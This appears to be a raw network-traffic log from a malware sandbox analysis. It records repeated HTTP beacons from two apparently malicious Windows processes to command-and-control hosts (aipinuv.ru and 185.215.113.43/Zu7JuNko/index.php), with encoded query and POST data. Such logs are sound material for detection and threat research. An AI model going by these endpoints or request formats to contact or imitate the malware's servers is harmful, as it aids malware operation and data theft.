Nov 15, 2024 14:11:57.363876104 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50187	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:58.228666067 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:59.153610945 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:59.261332989 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:59.569947004 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50188	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:59.000363111 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:59.897456884 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50190	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:59.696696043 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:00.599083900 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50191	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:00.719158888 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:01.666992903 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:12:01.778819084 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:02.088788986 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50192	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:01.416645050 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50193	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:02.218077898 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:03.632158995 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50194	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:03.050668955 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:03.953665972 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50196	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:03.750401974 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:04.663992882 CET	784	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 32 34 30 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 62 39 30 63 64 65 64 31 38 30 31 65 61 61 36 35 30 66 34 30 31 64 37 66 61 38 31 65 66 39 34 38 37 34 64 38 62 34 38 64 36 66 62 64 39 33 32 32 39 61 31 34 62 65 30 64 36 63 37 31 31 32 61 65 61 37 37 35 38 61 64 37 65 66 37 36 35 61 61 32 64 35 37 63 30 65 30 64 30 30 64 64 65 34 32 63 61 37 34 62 61 31 31 66 66 33 33 38 61 32 64 65 35 31 30 61 66 37 38 63 34 35 33 62 63 66 64 34 66 65 62 35 66 36 31 34 31 65 65 32 37 36 64 39 34 33 62 36 37 38 65 66 34 31 38 63 32 66 31 39 33 39 39 32 35 63 63 36 65 39 37 30 38 64 39 35 35 38 63 32 30 62 37 35 39 62 33 65 39 35 34 32 30 65 39 37 64 63 63 66 38 37 30 61 37 38 64 65 63 64 36 35 34 65 37 33 65 63 61 31 63 33 34 35 64 35 61 32 30 65 38 32 64 37 30 31 36 36 34 62 39 65 65 39 33 66 66 38 30 32 63 34 66 65 37 35 38 37 65 32 62 66 61 32 61 35 64 66 37 66 37 65 36 38 66 66 63 32 30 37 39 61 30 65 65 35 39 39 31 38 32 65 35 37 62 32 30 31 [TRUNCATED] Data Ascii: 24067b69c953804b26b565fe95b321bd19a55fb90cded1801eaa650f401d7fa81ef94874d8b48d6fbd93229a14be0d6c7112aea7758ad7ef765aa2d57c0e0d00dde42ca74ba11ff338a2de510af78c453bcfd4feb5f6141ee276d943b678ef418c2f1939925cc6e9708d9558c20b759b3e95420e97dccf870a78decd654e73eca1c345d5a20e82d701664b9ee93ff802c4fe7587e2bfa2a5df7f7e68ffc2079a0ee599182e57b2010b769ef98cbb967d275072a367aad5ecdc3af3929b0c80eb800b2a332bbdbca3971340fd331f517e8dbbf074fd23412c35dc5f1638329b7885fa2eadaadc03b28b77ca3ec0f93bebe775cbe86f329a7fb858614ee15fc58814872ceb0c6e3da4861ab9aee3aaf7f880732b523d039c39903d554bf32041c51fa0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50198	185.208.158.202	80	5436	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:04.787175894 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:05.700392008 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:12:05.811427116 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:06.112037897 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50199	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:05.473617077 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:06.382250071 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50200	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:06.235332012 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:07.146994114 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50201	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:07.267807007 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:08.183062077 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50202	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:08.022284031 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:08.916476965 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50203	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:08.299344063 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:09.221513987 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:12:09.328531981 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:09.630198002 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50204	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:09.756189108 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:10.672393084 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50205	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:10.441209078 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:11.367650986 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50206	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:10.800771952 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:11.703475952 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50209	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:11.910001040 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:12.824157953 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50210	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:12.943156004 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:13.863329887 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50211	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:13.006778955 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:13.904779911 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50213	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:13.989403009 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
